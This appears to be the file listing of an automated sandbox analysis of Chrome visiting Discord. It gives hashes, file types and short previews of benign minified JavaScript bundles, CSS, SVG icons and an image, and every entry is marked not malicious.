                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["10778"],{418757:function(e){e.exports="/assets/b7d1dc6b0746101719c5.png"},494207:function(e){e.exports="/assets/85153fe71873da0f5802.svg"},320440:function(e){e.exports="/assets/4676f063fb9f129e9fdb.svg"},561030:function(e){e.exports="/assets/75c80c4160a66983ae66.svg"},419185:function(e){e.exports="/assets/47e72e6360ce185adab6.svg"},826806:function(e){e.exports="/assets/fb418059f41b569abca4.svg"},123013:function(e){e.exports="/assets/98cacc492d985565ed4f.png"},540909:function(e){e.exports="/assets/2a5176cf2bd0ccdf0e7b.svg"},232454:function(e){e.exports="/assets/ad2027f11792ba8c0e7f.svg"},526916:function(e){e.exports="/assets/f38b6aefa24dc9a54765.svg"},29654:function(e){e.exports="/assets/dde11474b0623b723861.svg"},820160:function(e,t,n){n.d(t,{Z:function(){return c}});var r=n(200651);n(192379);var i=n(481060),s=n(813197),l=n(388032),a=n(510186);function c(e){let{icon:t,onChange:n}=e;return(0,r.jsx)(i.Fo
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (35788)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):35789
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.430592634769776
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:YtAUnADzjJMZOz31CcPtMjBupLTBr3DozAbb2S+h3pjeuOzPRTfZoDpavLhuYpWZ:YtnArJj3ku1BVbbqUNJgacfYL8
                                                                                                                                                                                                                                                                                    MD5:C9478705D12E7F577E6D06604F6BFF01
                                                                                                                                                                                                                                                                                    SHA1:707CA0D141AEB8C545C6AAE1D1583C779E4800E2
                                                                                                                                                                                                                                                                                    SHA-256:5B652A2383B0A8B2DE5AAF8130AC0C5ADB3830C6D0E9EC074B0773272F8BA86E
                                                                                                                                                                                                                                                                                    SHA-512:C5EE06D0416C627EB7A040353F1D9A27C8E96E688F9A200FFA7E5978400C49348AA388DD8F2108A1507D7CBC61524F83118DFF974927C32B971E1EABFD9F82C4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/api/v9/experiments?with_guild_experiments=true
                                                                                                                                                                                                                                                                                    Preview:{"fingerprint":"1309974925423153294.42Ce08a9wThnlRToTnNlmvvLUxI","assignments":[[2810205487,1,1,-1,3,1344,0,0],[2617218444,4,1,-1,2,719,0,0],[3035674767,0,1,-1,0,2241,0,0],[1609782151,0,1,-1,2,5932,0,0],[3643362751,0,1,-1,0,5056,0,0],[3753034466,1,2,-1,0,9399,0,0],[1913882179,0,1,-1,2,6057,0,0],[1567199723,0,1,-1,1,2497,0,0],[3091068323,0,2,-1,10,1021,0,0],[454783470,4,1,-1,0,2635,0,0],[3450899088,1,1,-1,0,8651,0,0],[3656796460,3,3,-1,3,6789,0,0],[2519288568,0,1,-1,4,2097,0,0],[1814483290,0,1,-1,0,256,0,0],[4221006726,0,1,-1,0,6394,0,0],[1398673921,1,1,-1,0,5969,0,0],[2532700533,0,1,-1,0,207,0,0],[3557480712,0,1,-1,0,8764,0,0],[853403133,4,1,-1,0,5204,0,0],[2491005019,4,1,-1,0,5655,0,0],[3889077804,2,1,-1,0,5044,0,0],[4079214319,2,1,-1,0,7902,0,0],[1532280548,16,1,-1,5,5050,0,0],[1095779154,0,1,-1,4,5439,0,0],[1398007839,0,1,-1,2,7481,0,0],[1034661306,0,1,-1,0,4314,0,0],[1944696695,0,1,-1,0,655,0,0],[828251710,2,1,-1,1,8988,0,0],[3124003316,1,1,-1,0,133,0,0],[2676348506,0,1,-1,0,9854,0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3481)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3530
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.525597791927395
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:4SloopsVL5u5CfGRxnDFzmThAlvnPE17cXfXTrI1iQhTTrUE7qp6upMNqsykTHuV:CokFVfMD04DvEbrOp6udE6ezfkjj
                                                                                                                                                                                                                                                                                    MD5:BE6064FF8C1D480AFB80FE48762A06C1
                                                                                                                                                                                                                                                                                    SHA1:F832A784FAEDB0BCFEE78661031D3C23C622501A
                                                                                                                                                                                                                                                                                    SHA-256:3666E614B6564F13247BF5E53B0DD5C57F27ED75F397AA839F4B75BF55177203
                                                                                                                                                                                                                                                                                    SHA-512:78E847E48E1A509B9E01550B10A94EA77D4D6BD9208131DD52FFAA379150660A2B7BA11750CA87173FDE4EB75A99512BC98ABDD6593D47DC1A0B8886905DF08E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var r={504053:function(r,t,e){e.d(t,{F:function(){return o}}),e(518263),e(970173),e(520712),e(268111),e(941497),e(32026),e(480839),e(744285),e(492257),e(873817),e(863942),e(642549),e(653041);var n=e(788900);function o(r){let t=function(r){let{detail:t=1,pop:e=1}=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},{PI:o,min:f,max:i,cos:u,round:a}=Math,c=r[0]|r[1]<<8|r[2]<<16,l=r[3]|r[4]<<8,s=(63&c)/63,p=(c>>6&63)/31.5-1,d=(c>>12&63)/31.5-1,v=c>>23,h=l>>15,b=i(3,h?v?5:7:7&l),g=i(3,h?7&l:v?5:7),y=v?(15&r[5])/15:1,O=(r[5]>>4)/15,m=v?6:5,w=0,x=(t,e,n)=>{let o=[];for(let f=0;f<e;f++)for(let i=f?0:1;i*e<t*(e-f);i++)o.push(((r[m+(w>>1)]>>((1&w++)<<2)&15)/7.5-1)*n);return o},j=x(b,g,(c>>18&31)/31/2),k=x(3,3,(l>>3&63)/63*e),P=x(3,3,(l>>9&63)/63*e),_=v?x(5,5,O):[],A=(0,n.UN)(r),C=a(A>1?32:32*A),F=a(A>1?32/A:32),M=new Uint8Array(C*F*4),U=[],T=[];for(let r=0,e=0;r<F;r++)for(let n=0;n<C;n++,e+=4){let a=s,c=p,l=d,h=y;for(let r=0,t=i(b,v?5:3);r<t;r++)U[r]=u(o/C*(n+.5)*r);for(l
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):1136
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.708059148982395
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:V7OnFlVRbrP6rwUTk4gOiQO0mlylfwyCqkl5hNnvD9YqNZmSlWWnoncHB:EnDVxrP6d1ixWwyolBnvDmqNYSlhncch
                                                                                                                                                                                                                                                                                    MD5:335EF99EF245DE6CD7A9AC9F53708CB2
                                                                                                                                                                                                                                                                                    SHA1:2B5CA0A706CC9173424B4611FB555CDD55007E12
                                                                                                                                                                                                                                                                                    SHA-256:2357B2BE4AB9C8C08069E4DBCA7252CD0FBD6A42ECCAA05740995A74BF202192
                                                                                                                                                                                                                                                                                    SHA-512:C3E302B5DB8C84A81F724EB7D8BF22241BD66C6A50BF98710939B021BF13773823542244DA8C34F2D3C90DA1978B6BDF68CA3BD08BF82ED40CBEF100B639DF4A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://cdn.discordapp.com/icons/1250434927087058944/06f5aa2f0dfc1da41888860135dc216c.webp?size=64
                                                                                                                                                                                                                                                                                    Preview:RIFFh...WEBPVP8X........?..?..ALPH.......m.!G...S.'...m.m.c[...m..nl..J.{..:... W..I..I=4j.1....zrL.i.%._.k...@....0.1'6.tH.._.-.ry...O^.K.'|eA..*!\J_...!.y.F.^.!..p.~o.L...!.(".......p. .w.d......R.!...v.}. ?J....{.....h...d..|...K..V.Q...2....._.(m..l.a..E.....y_.`..Mqg.o...%.H.....&.3.w....D..y.7...'..$.....HN[...-'2...N2....C..}7.78.m...2....E3..v.^ElL...hR.J.X.<L.....x.X.......U.5".f...6%"..W.@.&G.s..h.ND...Z......is.. .=..[.Pv..ND.6..}o.Qz.Fu......q...a.F.,..k/).na...g..kD4..o..~].G...p.C...>5.z.........N.....(r2.a...._M..)\&...M...o>.M.....v._o.u:a...w..{.....9.F..k]..~....qn@.........$K."-.R.~b.8../....l..z....bq.K#..e.:...U..[^".[.T....DD...J..KJ%.N0'..J%K^.@..8q...1...k.'....z..7..m......1....`}.Sq......~...1.............:8..Pw%X..@=.....~.T.....c.....'._c`=. ..3..6..F.O..D0.]n....&.....DD.s...LD......{.._.....q...?...^.....`."...JtX.j...S....9....b..<;.)..!..5....\........I...Iv.. '..d..."}.j...I.Q..{.......'W.U]iF........!e...5..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):688
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.422809447424027
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:t6AbzVKIh4zXvVg/jzDJU0uE2pLAZTX9D1jPb1qcNRxU7EK53TQke:tDbzVKwkXveLPC0uWZjR1LhFFkxhe
                                                                                                                                                                                                                                                                                    MD5:C6CE0010471B65C0FAEDA6C53AB297BD
                                                                                                                                                                                                                                                                                    SHA1:8735052DE92D694B4EA91CECCAB0E7E8F75A3CC7
                                                                                                                                                                                                                                                                                    SHA-256:862046FEE1B4F3744F000347CC0B337871967B2BD9471BCB6DDED2A49A61C527
                                                                                                                                                                                                                                                                                    SHA-512:7A054A7E19F80F7735CCDBC13E9CAFA13A779764C1725161B4EC7D3C793CFFB2E56C61109AA5F09A21E9DE3FD46B2E2EC756A6B03E46F4760125D282C14273C4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:<svg fill="none" height="12" viewBox="0 0 13 12" width="13" xmlns="http://www.w3.org/2000/svg"><path d="m5.39011.540027c.35536-.720037 1.38211-.720036 1.73747.000002l1.18359 2.398201c.14111.28593.41388.48411.72942.52996l2.64661.38457c.7946.11546 1.1119 1.09196.5369 1.65243l-1.9151 1.86674c-.2283.22257-.33252.54323-.2786.8575l.4521 2.63587c.1357.7914-.69496 1.3949-1.40567 1.0213l-2.36717-1.2445c-.28223-.1484-.6194-.1484-.90162 0l-2.36717 1.2445c-.71072.3736-1.54138-.2299-1.40565-1.0213l.45209-2.63587c.0539-.31427-.05029-.63493-.27861-.8575l-1.915083-1.86674c-.574984-.56047-.2576998-1.53697.536908-1.65243l2.646575-.38457c.31554-.04585.58831-.24403.72943-.52996z" fill="#fff"/></svg>
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (18413)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):18462
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.314671574384619
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:r0Q0mLG04pG+rx1GoKoLItuPVMWpUdq3FYbNbekaYxeWoY/Lj0WMTUbbbutFY/Gf:r0PmLGTGGDGoRstuKFNdD/ORQM
                                                                                                                                                                                                                                                                                    MD5:3C20B3592827C7BA965C3553423F6D7A
                                                                                                                                                                                                                                                                                    SHA1:900DA6D6C154A06D1605224215A9E8EA816BC2FF
                                                                                                                                                                                                                                                                                    SHA-256:899823D78F92F74C6EE1843EDA8EDC259A03F07FF8737C7DD9F076E141E8A360
                                                                                                                                                                                                                                                                                    SHA-512:22C097EBBDCB6E93A2348A82AE7B10D598F235736F55A6412C029C9A2F6077CBDA4DAAB44570701D1C647F155CCB9B70427BBD97FD860E49D3E6CD96F6F3CB55
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["20011"],{482682:function(t){t.exports="/assets/ebb5b41de823fbc19d12.png"},450125:function(t){t.exports="/assets/1e4932a7afbb1fcdba2d.png"},733949:function(t){t.exports="/assets/e1ce6b38901837435ec5.png"},877604:function(t,i,e){e(411104);var s,n=e(200651),h=e(192379),a=e(120356),r=e.n(a),l=e(111543);function o(t,i,e){return i in t?Object.defineProperty(t,i,{value:e,enumerable:!0,configurable:!0,writable:!0}):t[i]=e,t}let d=t=>new Promise((i,e)=>{null==t&&e(Error("No image src passed"));let s=new Image;s.src=t,s.onload=()=>i(s),s.onerror=t=>e(t)});class u extends(s=h.PureComponent){componentDidUpdate(t){t.src!==this.props.src&&this.setState({loaded:!1},()=>this.initialize())}initialize(){d(this.props.src).then(()=>{!this.unmounting&&this.setState({loaded:!0})})}componentWillUnmount(){this.unmounting=!0}render(){let{className:t,src:i,alt:e,width:s,height:h,onLoad:a,style:o,imageClassName:d}=this.props,{lo
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):137
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.832107377824175
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:t6WH7W+lFAATcvcmJDmJS4RKb5KVErcHrFvR8hiJqGrqL0:t6Abli/c8mc4slmrFv2hiAe
                                                                                                                                                                                                                                                                                    MD5:70275FE3104CF1D3388586AD8FFD478E
                                                                                                                                                                                                                                                                                    SHA1:473EA46F5B22B5C7D14C39EE9C0C82811593883B
                                                                                                                                                                                                                                                                                    SHA-256:3269CF3FDA7681388472225BAD39B6BB3B26088A0A03B6CD5796195F0114CE13
                                                                                                                                                                                                                                                                                    SHA-512:044C0F8F1583FAEBA3A23FF2DF821A5A0E79C548DB3A6474614894DA2CB125476227407F865CF20D32DC7E4D9ADE09EBA6317EFB787EEED2570C0EBDFC401D2A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/af5116b1db004acbdb8b.svg
                                                                                                                                                                                                                                                                                    Preview:<svg fill="none" height="8" viewBox="0 0 9 8" width="9" xmlns="http://www.w3.org/2000/svg"><path d="m4.5 0 4.5 8h-9z" fill="#fff"/></svg>
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:assembler source, ASCII text, with very long lines (19387)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):37391
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.284597936094653
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:qVNMV9ptcE+wCFgFLWcE+wCFgFLjONOT/cEA6KAOD54Dow93TNZ:qAVeE++E+GONOzcEsYnjT
                                                                                                                                                                                                                                                                                    MD5:517B75BD9029567722B9C6E5C7B4DCBC
                                                                                                                                                                                                                                                                                    SHA1:814BC3B974BB66B67E08BB8C8A2C93F89F5A5515
                                                                                                                                                                                                                                                                                    SHA-256:2AE7BAE75D96A2B6CF6B4485506D4A6991CC1DDF161969A569F2976C13A8FA93
                                                                                                                                                                                                                                                                                    SHA-512:068CF3B605B124A4F08D367FAA76F107964CD31E439C1EB2B5C6C37A480B68C0AA20602B1B97ADD44896E97C280C940B89F64D141044CACA330016929EFEB56B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/ac8bc50434b97c69dbfa.css
                                                                                                                                                                                                                                                                                    Preview:.textContainer_dda65b{padding:6px 0}.buttonContainer_dda65b{margin-top:24px;margin-bottom:8px;display:flex;flex-direction:column;gap:8px}.listContainer_dda65b{margin-top:8px;margin-bottom:16px;display:flex;flex-direction:column;gap:8px;padding:8px 16px;border-radius:8px;background-color:var(--background-secondary)}.listItem_dda65b{display:flex;gap:8px;margin:8px 0;align-items:center}.divider_dda65b{background-color:var(--background-modifier-accent);opacity:.5}.whatList_dda65b{background-color:var(--background-secondary);border-radius:4px;margin-bottom:8px}.whatItem_dda65b{border-top:1px solid var(--background-modifier-accent)}.phoneFieldPopout_ff761b{width:220px;height:240px;position:absolute;top:40px;left:0}.phoneFieldPopout_ff761b .phoneFieldScroller_ff761b{height:196px;padding-bottom:10px}.phoneFieldPopout_ff761b .countryItem_ff761b{width:100%}.phoneFieldPopout_ff761b .countryName_ff761b{font-size:13px;line-height:18px;margin-right:8px;white-space:nowrap;text-overflow:ellipsis;overf
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1119213
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.87255128667712
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12288:wfm21G1c1LueOJJjm32FYYBNCgRzLzfSccT36FjYfTnjDLmn237z7v:wfm26Eujm32FbNvzLzqc1YvDLm23T
                                                                                                                                                                                                                                                                                    MD5:90185744D23C5063DC7FB2F3E6EF0ECD
                                                                                                                                                                                                                                                                                    SHA1:88786DEE688EF1EF0EC6491693B4A91CC74E58E6
                                                                                                                                                                                                                                                                                    SHA-256:054F36A6EBE7D8E5707B1098DFABB36B87D5C47C3E87E5E58922E17848205014
                                                                                                                                                                                                                                                                                    SHA-512:C3009EC868D8368706BAAD2A56E01CB9FB35F9166B8855E821286C762E5A549383E5967FB00E3BED4EA1F598CDF04BF10D46CEF6E88499000117730176466A76
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:(()=>{var e={654861:function(e,t,r){e=r.nmd(e);var n=function(e){"use strict";var t=s(9007199254740992),r="0123456789abcdefghijklmnopqrstuvwxyz",a="function"==typeof BigInt;function _(e,t,r,n){return void 0===e?_[0]:void 0!==t?10!=+t||r?x(e,t,r,n):F(e):F(e)}function o(e,t){this.value=e,this.sign=t,this.isSmall=!1}function i(e){this.value=e,this.sign=e<0,this.isSmall=!0}function E(e){this.value=e}function c(e){return -9007199254740992<e&&e<9007199254740992}function s(e){return e<1e7?[e]:e<1e14?[e%1e7,Math.floor(e/1e7)]:[e%1e7,Math.floor(e/1e7)%1e7,Math.floor(e/1e14)]}function l(e){u(e);var r=e.length;if(r<4&&0>g(e,t))switch(r){case 0:return 0;case 1:return e[0];case 2:return e[0]+1e7*e[1];default:return e[0]+(e[1]+1e7*e[2])*1e7}return e}function u(e){for(var t=e.length;0===e[--t];);e.length=t+1}function I(e){for(var t=Array(e),r=-1;++r<e;)t[r]=0;return t}function R(e){return e>0?Math.floor(e):Math.ceil(e)}function N(e,t){var r,n,a=e.length,_=t.length,o=Array(a),i=0;for(n=0;n<_;n++)i=(r=
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):109613
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4029332021931715
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:fCBKa1oPP8sGolumyOSsN5VYpLUBDL2QPidmHTRWisxpLAkF+d10J:qB9C81a5YpL5kl9sxpTa10J
                                                                                                                                                                                                                                                                                    MD5:80F500D4D0495E5C74E9B92CBC26F088
                                                                                                                                                                                                                                                                                    SHA1:A2C3F68D87AD8F793935FA7B8D05A0A2D635C4E0
                                                                                                                                                                                                                                                                                    SHA-256:407002AD3FD8CF26EF02A802DD0D4DB7BFF395D8C22F5F8580CA6CE65A797238
                                                                                                                                                                                                                                                                                    SHA-512:500C40BF257E7F4098B3B64CEDD49D8612FAF8B254CF496019C5B579C784A416F466C6BAC174B5317A663071E736C2DF82D22E6A7F88AF664BC421A974ABDF59
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["63288"],{473452:function(e,t){"use strict";t.Z=function(e){for(var t,n=e.length,o=n^n,r=0;n>=4;)t=(65535&(t=255&e.charCodeAt(r)|(255&e.charCodeAt(++r))<<8|(255&e.charCodeAt(++r))<<16|(255&e.charCodeAt(++r))<<24))*1540483477+(((t>>>16)*1540483477&65535)<<16),t^=t>>>24,o=(65535&o)*1540483477+(((o>>>16)*1540483477&65535)<<16)^(t=(65535&t)*1540483477+(((t>>>16)*1540483477&65535)<<16)),n-=4,++r;switch(n){case 3:o^=(255&e.charCodeAt(r+2))<<16;case 2:o^=(255&e.charCodeAt(r+1))<<8;case 1:o^=255&e.charCodeAt(r),o=(65535&o)*1540483477+(((o>>>16)*1540483477&65535)<<16)}return o^=o>>>13,o=(65535&o)*1540483477+(((o>>>16)*1540483477&65535)<<16),((o^=o>>>15)>>>0).toString(36)}},230371:function(e,t){"use strict";t.Z=function(e){var t={};return function(n){return void 0===t[n]&&(t[n]=e(n)),t[n]}}},184826:function(e,t){"use strict";t.Z=function(e){function t(e,t,o){var r=t.trim().split(h);t=r;var i=r.length,a=e.length;switch(a){case
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (905)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):957
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.034768569958886
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:Bw1JU1t21f1C1bA19RAHxrV1e7Co1RSg341Nzg5mBU9K9K/sSelw1NeVE:BgJ0t2DKeAtG1Es4Fg57Xeis+
                                                                                                                                                                                                                                                                                    MD5:20DDAA519E404695D0657D3868D2701F
                                                                                                                                                                                                                                                                                    SHA1:0BDF7AD9C1F272B72FD83741504A39D5E8097901
                                                                                                                                                                                                                                                                                    SHA-256:808A1D58F797547FE5A8ACDC841C6CA36E7440E1DCFFF9CB40497CAE9ED11143
                                                                                                                                                                                                                                                                                    SHA-512:3D556D1EA31E803BB1E4EE11F68DAFC2FD0121E1A0E7EBE0BEDD1AFDFD646B05357842C825FFA0909492BA7FA00530C8B79BCD7A3778CF5B663194DF6D3BC227
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/2917679ca8a08c390036.css
                                                                                                                                                                                                                                                                                    Preview:.wrapper_cd22e7,.activeWrapper_cd22e7{height:100%;left:0;position:absolute;top:0;width:100%;z-index:1002}.wrapper_cd22e7{pointer-events:none}.videoWrapper_cd22e7{position:absolute;transform:translate(-50%,-50%);top:50%;left:50%;z-index:200;pointer-events:none;width:auto;height:100%}@media(min-aspect-ratio:2880/2048){.videoWrapper_cd22e7{width:100%;height:auto}}.videoWrapperForHelper_cd22e7{position:absolute;pointer-events:none;z-index:200;top:0;left:0;width:100%;height:100%}.gadientHighlight_cd22e7{position:absolute;width:100%;height:100%;pointer-events:none;background-image:linear-gradient(90deg,var(--premium-tier-2-purple-for-gradients)0%,var(--premium-tier-2-purple-for-gradients-2)50%,var(--premium-tier-2-pink-for-gradients)100%)}.swipeWrapper_cd22e7{position:absolute;width:100%;height:100%;pointer-events:none}.swipe_cd22e7{position:absolute;height:100%;opacity:.1;width:auto;right:0;top:0}./*# sourceMappingURL=2917679ca8a08c390036.css.map*/
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3481)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):3530
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.525597791927395
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:4SloopsVL5u5CfGRxnDFzmThAlvnPE17cXfXTrI1iQhTTrUE7qp6upMNqsykTHuV:CokFVfMD04DvEbrOp6udE6ezfkjj
                                                                                                                                                                                                                                                                                    MD5:BE6064FF8C1D480AFB80FE48762A06C1
                                                                                                                                                                                                                                                                                    SHA1:F832A784FAEDB0BCFEE78661031D3C23C622501A
                                                                                                                                                                                                                                                                                    SHA-256:3666E614B6564F13247BF5E53B0DD5C57F27ED75F397AA839F4B75BF55177203
                                                                                                                                                                                                                                                                                    SHA-512:78E847E48E1A509B9E01550B10A94EA77D4D6BD9208131DD52FFAA379150660A2B7BA11750CA87173FDE4EB75A99512BC98ABDD6593D47DC1A0B8886905DF08E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/ac625b77a0bab0ee72df.js
                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var r={504053:function(r,t,e){e.d(t,{F:function(){return o}}),e(518263),e(970173),e(520712),e(268111),e(941497),e(32026),e(480839),e(744285),e(492257),e(873817),e(863942),e(642549),e(653041);var n=e(788900);function o(r){let t=function(r){let{detail:t=1,pop:e=1}=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},{PI:o,min:f,max:i,cos:u,round:a}=Math,c=r[0]|r[1]<<8|r[2]<<16,l=r[3]|r[4]<<8,s=(63&c)/63,p=(c>>6&63)/31.5-1,d=(c>>12&63)/31.5-1,v=c>>23,h=l>>15,b=i(3,h?v?5:7:7&l),g=i(3,h?7&l:v?5:7),y=v?(15&r[5])/15:1,O=(r[5]>>4)/15,m=v?6:5,w=0,x=(t,e,n)=>{let o=[];for(let f=0;f<e;f++)for(let i=f?0:1;i*e<t*(e-f);i++)o.push(((r[m+(w>>1)]>>((1&w++)<<2)&15)/7.5-1)*n);return o},j=x(b,g,(c>>18&31)/31/2),k=x(3,3,(l>>3&63)/63*e),P=x(3,3,(l>>9&63)/63*e),_=v?x(5,5,O):[],A=(0,n.UN)(r),C=a(A>1?32:32*A),F=a(A>1?32/A:32),M=new Uint8Array(C*F*4),U=[],T=[];for(let r=0,e=0;r<F;r++)for(let n=0;n<C;n++,e+=4){let a=s,c=p,l=d,h=y;for(let r=0,t=i(b,v?5:3);r<t;r++)U[r]=u(o/C*(n+.5)*r);for(l
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (13632)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):13681
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.656242388719142
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:pecfK3zZvqS+45fyDFHG79aAiZzWCvqq2L1HGgBnyFx7LHC:pecfK3V842FHGwW11ytO
                                                                                                                                                                                                                                                                                    MD5:59BB723DECFA5A2C2B359ED4C541E33B
                                                                                                                                                                                                                                                                                    SHA1:9127367FF0D823BC65EF067A3C2A2F4D9A0CBE8D
                                                                                                                                                                                                                                                                                    SHA-256:62EDDC80B34DF3AEA527CBF7D2FC413250531927E9F81968902F3D6BB5D127E8
                                                                                                                                                                                                                                                                                    SHA-512:B1E5CF1E6F441BECC47DFAB8BFB8BA6A7378995F004FB85D8ED6ECEE1EAB59D1770D578148B9144E33BBF0BECFA7E1D2113390723762A7E559126B0702EA646A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/f587337433e36ce917bd.js
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["60673"],{292824:function(t){t.exports="/assets/00fe8a6557e204eb9503.svg"},231239:function(t,e,n){var l=n(990547),r=n(283693),i=n(570140),a=n(573261),u=n(981631);e.Z={signup:(t,e)=>a.Z.post({url:u.ANM.HUB_WAITLIST_SIGNUP,body:{email:t,school:e},trackedActionData:{event:l.NetworkActionNames.HUB_WAITLIST_SIGNUP,properties:t=>{var e;let n=!1,l=null==t?void 0:null===(e=t.body)||void 0===e?void 0:e.email_domain;return null!=l&&(n=-1!==l.split(".").indexOf("edu")),(0,r.iG)({is_edu_email:n})}},rejectWithError:!1}),sendVerificationEmail:async(t,e,n)=>(await a.Z.post({url:u.ANM.HUB_EMAIL_VERIFY_SEND,body:{email:t,guild_id:n,allow_multiple_guilds:e,use_verification_code:!0},trackedActionData:{event:l.NetworkActionNames.HUB_EMAIL_VERIFY_SEND,properties:t=>{var e;let n=null==t?void 0:null===(e=t.body)||void 0===e?void 0:e.has_matching_guild;return(0,r.iG)({has_matching_guild:n})}},rejectWithError:!1})).body,async v
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
